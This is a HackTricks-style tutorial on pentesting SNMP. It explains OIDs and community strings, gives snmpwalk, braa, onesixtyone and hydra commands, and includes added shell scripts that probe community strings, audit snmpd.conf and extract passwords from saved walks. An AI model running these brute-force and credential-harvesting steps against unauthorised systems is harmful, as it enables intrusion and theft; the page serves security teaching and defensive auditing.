161,162,10161,10162/udp - Pentesting SNMP
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Bug bounty tip: sign up for Intigriti, a premium bug bounty platform created by hackers, for hackers! Join us at https://go.intigriti.com/hacktricks today, and start earning bounties up to $100,000!
{% embed url="https://go.intigriti.com/hacktricks" %}
Basic Information
SNMP - Simple Network Management Protocol is a protocol used to monitor different devices in the network (like routers, switches, printers, IoTs...).
```
PORT    STATE SERVICE REASON              VERSION
161/udp open  snmp    udp-response ttl 244 ciscoSystems SNMPv3 server (public)
```
{% hint style="info" %} SNMP also uses port 162/UDP for traps: data packets sent from the SNMP agent to the manager without having been explicitly requested. {% endhint %}
MIB
To ensure that SNMP access works across manufacturers and with different client-server combinations, the Management Information Base (MIB) was created. A MIB is a vendor-independent format for storing device information: a text file in which all queryable SNMP objects of a device are listed in a standardized tree hierarchy. It contains at least one Object Identifier (OID), which, in addition to the required unique address and a name, also provides the type, access rights, and a description of the respective object.
MIB files are written in the Abstract Syntax Notation One (ASN.1) based ASCII text format. The MIBs do not contain data themselves; they describe where to find which information and what it looks like, i.e. which values a specific OID returns and which data type is used.
OIDs
Object Identifiers (OIDs) are the unique identifiers of the managed objects within a Management Information Base (MIB).
The highest levels of the MIB object IDs, or OIDs, are allocated to different standard-setting organizations; it is within these top levels that the framework for global management practices and standards is established.
Vendors are granted private branches, within which they can include the managed objects pertinent to their own product lines. This gives a structured method for identifying and managing objects across different vendors and standards.
You can navigate the OID tree from the web at http://www.oid-info.com/cgi-bin/display?tree=#focus or see what an OID means (like 1.3.6.1.2.1.1) by accessing http://oid-info.com/get/1.3.6.1.2.1.1.
There are some well-known OIDs, like the ones under 1.3.6.1.2.1, which references the MIB-2 defined Simple Network Management Protocol (SNMP) variables. From the OIDs hanging from this one you can obtain some interesting host data (system data, network data, processes data...).
OID Example
1 . 3 . 6 . 1 . 4 . 1 . 1452 . 1 . 2 . 5 . 1 . 3. 21 . 1 . 4 . 7
- 1 – iso (marks this as an OID)
- 3 – org (identified organization)
- 6 – dod (Department of Defense)
- 1 – internet
- 4 – private organization
- 1 – enterprise or business entity
- 1452 – organization name
- 1 – device type
- 2 – remote terminal unit
- 5 – discrete alarm point
- 1 – specific point
- 3 – port
- 21 – port address
- 1 – display for port
- 4 – point number
- 7 – point state
SNMP Versions
There are 2 important versions of SNMP:
- SNMPv1: The main one; it is still the most frequent. Authentication is based on a string (the community string) that travels in plain text, as does all the information. Versions 2 and 2c also send the traffic in plain text and use a community string as authentication.
- SNMPv3: Uses a better authentication form (HMAC-based users instead of a shared string) and the information can travel encrypted (authPriv). A dictionary attack could still be performed, but it would be much harder to find the correct credentials than in SNMPv1 and v2.
Community Strings
As mentioned before, in order to access the information saved in the MIB you need to know the community string on versions 1 and 2/2c, and the credentials on version 3.
There are 2 types of community strings:
- public: mainly read-only functions
- private: Read/Write in general
Note that the writability of an OID depends on the community string used, so even if you find that "public" is being used, you could still be able to write some values. Also, there may exist objects which are always "Read Only"; if you try to write to such an object a noSuchName or readOnly error is received.
In versions 1 and 2/2c, if you use a bad community string the server won't respond. So, if it responds, a valid community string was used.
Ports
- The SNMP agent receives requests on UDP port 161.
- The manager receives notifications (Traps and InformRequests) on port 162.
- When used with Transport Layer Security or Datagram Transport Layer Security, requests are received on port 10161 and notifications are sent to port 10162.
Brute-Force Community String (v1 and v2c)
To guess the community string you could perform a dictionary attack; the onesixtyone and Hydra commands in the HackTricks Automatic Commands section at the bottom of this page are two ways to do it. A frequently used community string is public.
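To see why v1/v2c community strings are so easy to sniff and guess, here is an added example (not HackTricks' code) that hand-encodes an SNMPv1/v2c GetRequest in POSIX sh. The community string sits in the clear right after the version integer, the OID is BER-encoded the way the OID Example above describes (the 1452 enterprise arc needs two bytes), and because agents silently drop requests with a wrong community, "any reply at all" is the validity check used by dictionary attacks. The target IP and the wordlist name in the comments are assumptions.

```shell
#!/bin/sh
# Added example (not HackTricks' code): hand-encode an SNMPv1/v2c GetRequest
# so the clear-text community string and the BER-encoded OID are visible
# byte by byte. Only printf, od, tr and sh arithmetic are used.

# BER length octets: short form below 128, long form 0x81/0x82 above (enough here)
ber_len() {
    if [ "$1" -lt 128 ]; then printf '%02x' "$1"
    elif [ "$1" -lt 256 ]; then printf '81%02x' "$1"
    else printf '82%04x' "$1"; fi
}

# One OID arc in base 128, most significant group first, continuation bit set
# on every byte but the last (1452 -> 8b 2c; arcs below 128 stay one byte)
ber_arc() {
    n=$1; out=$(printf '%02x' $((n % 128))); n=$((n / 128))
    while [ "$n" -gt 0 ]; do
        out=$(printf '%02x' $((n % 128 + 128)))$out; n=$((n / 128))
    done
    printf '%s' "$out"
}

# OBJECT IDENTIFIER (tag 06): the first two arcs are folded into 40*a+b
ber_oid() {
    set -- $(printf '%s' "${1#.}" | tr '.' ' ')
    body=$(ber_arc $((40 * $1 + $2))); shift 2
    for arc in "$@"; do body=$body$(ber_arc "$arc"); done
    printf '06%s%s' "$(ber_len $((${#body} / 2)))" "$body"
}

ber_int() { printf '0201%02x' "$1"; }          # INTEGER, 0..127 only (enough for version/ids)
ber_str() {                                     # OCTET STRING from ASCII text
    hex=$(printf '%s' "$1" | od -An -v -tx1 | tr -d ' \n')
    printf '04%s%s' "$(ber_len $((${#hex} / 2)))" "$hex"
}
ber_seq() { printf '%s%s%s' "$1" "$(ber_len $((${#2} / 2)))" "$2"; }   # constructed: tag, body

# snmp_get_hex VERSION COMMUNITY OID REQUEST_ID  (VERSION 0 = v1, 1 = v2c)
# -> hex of a complete SNMP message carrying one GetRequest (tag a0) varbind
snmp_get_hex() {
    varbind=$(ber_seq 30 "$(ber_oid "$3")0500")             # OID + NULL placeholder value
    pdu=$(ber_seq a0 "$(ber_int "$4")$(ber_int 0)$(ber_int 0)$(ber_seq 30 "$varbind")")
    ber_seq 30 "$(ber_int "$1")$(ber_str "$2")$pdu"
}

# Send one request and report whether the agent answered. Agents silently drop
# v1/v2c requests with a wrong community, so "any reply" == "valid string".
# Needs xxd, nc and a live agent; not exercised by the offline demo below.
snmp_probe() {   # HOST COMMUNITY
    snmp_get_hex 1 "$2" .1.3.6.1.2.1.1.1.0 1 | xxd -r -p | nc -u -w 2 "$1" 161 \
        | od -An -tx1 | grep -q . && echo "$2: agent replied, community is valid"
}

# Offline demo: v1 and v2c requests for sysDescr.0; "public" is 70 75 62 6c 69 63
# in both, right after the version integer, with nothing protecting it.
snmp_get_hex 0 public .1.3.6.1.2.1.1.1.0 1; echo
snmp_get_hex 1 public .1.3.6.1.2.1.1.1.0 2; echo
# Wordlist probe (assumed target/wordlist):
#   for c in $(cat wordlist.txt); do snmp_probe 10.10.11.136 "$c"; done
```

The v1 request for sysDescr.0 is 40 bytes: 30 26 (message) 02 01 00 (version 1) 04 06 "public" a0 19 (GetRequest) 02 01 01 (request-id) 02 01 00 02 01 00 (error status/index) 30 0e 30 0c 06 08 2b 06 01 02 01 01 01 00 05 00. Anyone on the path reads the community string directly from the second field; that is the whole weakness of v1/v2c that the versions section above describes.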
Enumerating SNMP
It is recommended to install the following so you can see what each OID gathered from the device means:
```bash
apt-get install snmp-mibs-downloader
download-mibs
# Finally comment the line saying "mibs :" in /etc/snmp/snmp.conf
sudo vi /etc/snmp/snmp.conf
```
If you know a valid community string, you can access the data using SNMPWalk or SNMP-Check:
```bash
snmpbulkwalk -c [COMM_STRING] -v [VERSION] [IP] . #Don't forget the final dot
snmpbulkwalk -c public -v2c 10.10.11.136 .
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP]
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] 1.3.6.1.2.1.4.34.1.3 #Get IPv6, needed dec2hex
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] NET-SNMP-EXTEND-MIB::nsExtendObjects #get extended
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] .1 #Enum all
snmp-check [DIR_IP] -p [PORT] -c [COMM_STRING]
nmap --script "snmp* and not snmp-brute" <target>
braa <community string>@<IP>:.1.3.6.* #Bruteforce specific OID
```
Thanks to the extended queries (download-mibs), it is possible to enumerate even more about the system with the following command:
```bash
snmpwalk -v X -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
```
SNMP holds a lot of information about the host. Things you may find interesting include: network interfaces (IPv4 and IPv6 addresses), usernames, uptime, server/OS version, and processes (whose command lines may contain passwords).
Dangerous Settings
In the realm of network management, certain configurations and parameters are key to ensuring comprehensive monitoring and control; the same settings hand an attacker full read/write access when they are too permissive.
Access Settings
Two main settings enable access to the full OID tree, which is a crucial component in network management:
- rwuser noauth is set to permit full access to the OID tree without the need for authentication. This setting is straightforward and allows for unrestricted access.
- For more specific control, access can be granted using rwcommunity for IPv4 addresses and rwcommunity6 for IPv6 addresses. Both take a community string and an optional source address; when the source is omitted, they offer full write access irrespective of the request's origin.
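The following added example (not HackTricks' or net-snmp's code) puts a constructed snmpd.conf with the dangerous directives above next to a hardened SNMPv3-only one, and runs a small awk audit over both. User and community names and the passphrases are placeholders; the directive syntax is net-snmp's.

```shell
#!/bin/sh
# Added example, not HackTricks' or net-snmp's code: flag the dangerous snmpd.conf
# access directives next to a hardened SNMPv3-only configuration. Both files are
# constructed for the demo; names and passphrases are placeholders.
# net-snmp syntax:
#   rwcommunity COMMUNITY [SOURCE [OID | -V VIEW]]   (SOURCE omitted = any host)
#   rwuser USER [noauth|auth|priv [OID | -V VIEW]]

WORK="${TMPDIR:-/tmp}/snmpd-audit.$$"
mkdir -p "$WORK"

# The page's "rwuser noauth" with the user name filled in, plus clear-text
# write communities reachable from any source address.
cat > "$WORK/weak.conf" <<'EOF'
rwuser admin noauth          # v3 user, but no authentication required
rwcommunity private          # v1/v2c write access, any source address
rwcommunity6 private         # same for IPv6
rocommunity public           # default read string, any source
EOF

# Hardened: v3 only, authPriv, read-only, restricted to the system subtree.
cat > "$WORK/hardened.conf" <<'EOF'
createUser monitor SHA "replace-with-long-auth-passphrase" AES "replace-with-long-priv-passphrase"
rouser monitor priv -V systemonly
view systemonly included .1.3.6.1.2.1.1
EOF

# audit_snmpd_conf FILE -> one finding per dangerous directive (comments stripped)
audit_snmpd_conf() {
    sed 's/#.*//; s/[[:space:]]*$//' "$1" | awk '
    $1 == "rwuser" && ($2 == "noauth" || $3 == "noauth") {
        print "HIGH: " $0 " -> v3 write access with no authentication"; next }
    $1 == "rwcommunity" || $1 == "rwcommunity6" {
        src = ($3 == "") ? "any source" : $3
        print "HIGH: " $0 " -> clear-text write community, allowed from " src; next }
    $1 == "rouser" && $3 == "noauth" {
        print "MEDIUM: " $0 " -> v3 read access with no authentication"; next }
    $1 == "rocommunity" || $1 == "rocommunity6" {
        if ($2 == "public" || $3 == "")
            print "MEDIUM: " $0 " -> guessable or unrestricted read community"; next }
    '
}

echo "== weak.conf";     audit_snmpd_conf "$WORK/weak.conf"
echo "== hardened.conf"; audit_snmpd_conf "$WORK/hardened.conf"
```

Run against a real /etc/snmp/snmpd.conf it reports four findings for the weak file and none for the hardened one; anything it prints as HIGH is a write path that the "From SNMP to RCE" section below can turn into command execution.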
SNMP Parameters for Microsoft Windows
A series of Management Information Base (MIB) values are used to monitor various aspects of a Windows system through SNMP:
- System Processes: 1.3.6.1.2.1.25.1.6.0 gives the number of active processes on the system.
- Running Programs: 1.3.6.1.2.1.25.4.2.1.2 lists the currently running programs.
- Processes Path: 1.3.6.1.2.1.25.4.2.1.4 tells where each process is running from.
- Storage Units: 1.3.6.1.2.1.25.2.3.1.4 describes the storage units.
- Software Name: 1.3.6.1.2.1.25.6.3.1.2 identifies the software installed on the system.
- User Accounts: 1.3.6.1.4.1.77.1.2.25 lists the user accounts.
- TCP Local Ports: 1.3.6.1.2.1.6.13.1.3 lists the TCP local ports, giving insight into listening services and active connections.
Cisco
Take a look to this page if you are Cisco equipment:
{% content-ref url="cisco-snmp.md" %} cisco-snmp.md {% endcontent-ref %}
From SNMP to RCE
If you have the string that allows you to write values inside the SNMP service, you may be able to abuse it to execute commands:
{% content-ref url="snmp-rce.md" %} snmp-rce.md {% endcontent-ref %}
Massive SNMP
Braa is a mass SNMP scanner. The intended usage of such a tool is, of course, making SNMP queries – but unlike snmpwalk from net-snmp, it is able to query dozens or hundreds of hosts simultaneously, and in a single process. Thus, it consumes very few system resources and does the scanning VERY fast.
Braa implements its OWN snmp stack, so it does NOT need any SNMP libraries like net-snmp.
Syntax: braa [Community-string]@[IP of SNMP server]:[iso id]
```bash
braa ignite123@192.168.1.125:.1.3.6.*
```
Devices
The process begins with extracting the sysDescr MIB data (1.3.6.1.2.1.1.1.0) from each saved output file (one per scanned host) to identify the devices. This is done with a grep command:
```bash
grep ".1.3.6.1.2.1.1.1.0" *.snmp
```
Identify Private String
As an example, if you can identify the private community string used by an organization on its Cisco IOS routers, you could potentially extract the running configurations from those routers. The best approach to find such data involves analyzing the SNMP Trap data for the word "trap" with a grep command:
```bash
grep -i "trap" *.snmp
```
Usernames/Passwords
Logs stored within MIB tables are examined for failed logon attempts, which might accidentally include passwords typed into the username field. Searching for keywords like fail, failed, or login can help find valuable data:
```bash
grep -i "login\|fail" *.snmp
```
Emails
Finally, to extract email addresses from the data, a grep command with a regular expression is used, focusing on patterns that match email formats:
```bash
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" *.snmp
```
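An added example (not HackTricks' tooling) that turns the greps above and the Windows OIDs from "SNMP Parameters for Microsoft Windows" into a repeatable triage of a saved walk. It assumes numeric-OID output as written by snmpwalk with -On; the walk file below is constructed for the demo (host name, PIDs and values are invented), and the hrSWRunParameters column (.1.3.6.1.2.1.25.4.2.1.5, from HOST-RESOURCES-MIB) is added because that is where command-line passwords show up.

```shell
#!/bin/sh
# Added example, not HackTricks' tooling: pull the Windows host facts and the
# credential-looking strings out of a saved walk. Assumes numeric-OID output as
# written by:  snmpwalk -v2c -c public -On 10.0.0.5 .1 > 10.0.0.5.snmp
# The file below is constructed for the demo; host, PIDs and values are invented.

SAMPLE="${TMPDIR:-/tmp}/10.0.0.5.snmp"
cat > "$SAMPLE" <<'EOF'
.1.3.6.1.2.1.1.1.0 = STRING: "Hardware: Intel64 Family 6 Model 85 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 17763 Multiprocessor Free)"
.1.3.6.1.2.1.1.5.0 = STRING: "FILESRV01"
.1.3.6.1.2.1.6.13.1.3.0.0.0.0.445.0.0.0.0.0 = INTEGER: 445
.1.3.6.1.2.1.6.13.1.3.0.0.0.0.3389.0.0.0.0.0 = INTEGER: 3389
.1.3.6.1.2.1.25.1.6.0 = Gauge32: 97
.1.3.6.1.2.1.25.4.2.1.2.1204 = STRING: "svchost.exe"
.1.3.6.1.2.1.25.4.2.1.2.3316 = STRING: "backup.exe"
.1.3.6.1.2.1.25.4.2.1.4.1204 = STRING: "C:\Windows\System32\"
.1.3.6.1.2.1.25.4.2.1.4.3316 = STRING: "C:\Tools\"
.1.3.6.1.2.1.25.4.2.1.5.1204 = STRING: "-k netsvcs"
.1.3.6.1.2.1.25.4.2.1.5.3316 = STRING: "--user backupsvc --password Summer2023!"
.1.3.6.1.4.1.77.1.2.25.1.1.5.71.117.101.115.116 = STRING: "Guest"
.1.3.6.1.4.1.77.1.2.25.1.1.9.98.97.99.107.117.112.115.118.99 = STRING: "backupsvc"
EOF

# Keep only the value: drop "OID = TYPE: " and the surrounding quotes
snmp_value() { sed 's/^[^=]*= [A-Za-z0-9 -]*: *//; s/^"//; s/"$//'; }

# walk_oid FILE OID-PREFIX -> values of every instance under that prefix
walk_oid() { grep "^$(printf '%s' "$2" | sed 's/\./\\./g')\." "$1" | snmp_value; }

sys_descr()     { walk_oid "$1" .1.3.6.1.2.1.1.1; }
processes()     { walk_oid "$1" .1.3.6.1.2.1.25.4.2.1.2; }     # hrSWRunName
process_paths() { walk_oid "$1" .1.3.6.1.2.1.25.4.2.1.4; }     # hrSWRunPath
process_args()  { walk_oid "$1" .1.3.6.1.2.1.25.4.2.1.5; }     # hrSWRunParameters (assumed addition)
users()         { walk_oid "$1" .1.3.6.1.4.1.77.1.2.25; }      # LanMgr user table
tcp_ports()     { walk_oid "$1" .1.3.6.1.2.1.6.13.1.3 | sort -n | uniq; }
# Same idea as grep -i "login\|fail" above, widened to password-like words
secrets()       { grep -iE 'pass(word|wd)?|pwd|login|fail' "$1" | snmp_value; }

report() {
    f=$1
    echo "== $f"
    echo "sysDescr : $(sys_descr "$f")"
    echo "users    : $(users "$f" | tr '\n' ' ')"
    echo "tcp ports: $(tcp_ports "$f" | tr '\n' ' ')"
    echo "processes:"; processes "$f" | sed 's/^/  /'
    echo "args     :"; process_args "$f" | sed 's/^/  /'
    echo "secrets  :"; secrets "$f" | sed 's/^/  /'
}
report "$SAMPLE"
```

Point it at every *.snmp file produced by the braa loop above (for f in *.snmp; do report "$f"; done) and the backup.exe command line in the sample is the kind of finding that makes the process table worth walking even on a read-only community.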
Modifying SNMP values
You can use NetScanTools to modify values. You will need to know the private (read/write) string in order to do so.
Spoofing
If there is an ACL that only allows some IPs to query the SNMP service, you can spoof one of those addresses inside the UDP packet and sniff the traffic for the answer.
Examine SNMP Configuration files
- snmp.conf
- snmpd.conf
- snmp-config.xml
HackTricks Automatic Commands
```yaml
Protocol_Name: SNMP #Protocol Abbreviation if there is one.
Port_Number: 161 #Comma separated if there is more than one.
Protocol_Description: Simple Network Management Protocol #Protocol Abbreviation Spelled out

Entry_1:
  Name: Notes
  Description: Notes for SNMP
  Note: |
    SNMP - Simple Network Management Protocol is a protocol used to monitor different devices in the network (like routers, switches, printers, IoTs...).

    https://book.hacktricks.xyz/pentesting/pentesting-snmp

Entry_2:
  Name: SNMP Check
  Description: Enumerate SNMP
  Command: snmp-check {IP}

Entry_3:
  Name: OneSixtyOne
  Description: Crack SNMP passwords
  Command: onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt {IP} -w 100

Entry_4:
  Name: Nmap
  Description: Nmap snmp (no brute)
  Command: nmap --script "snmp* and not snmp-brute" {IP}

Entry_5:
  Name: Hydra Brute Force
  Description: Need Nothing
  Command: hydra -P {Big_Passwordlist} -v {IP} snmp
```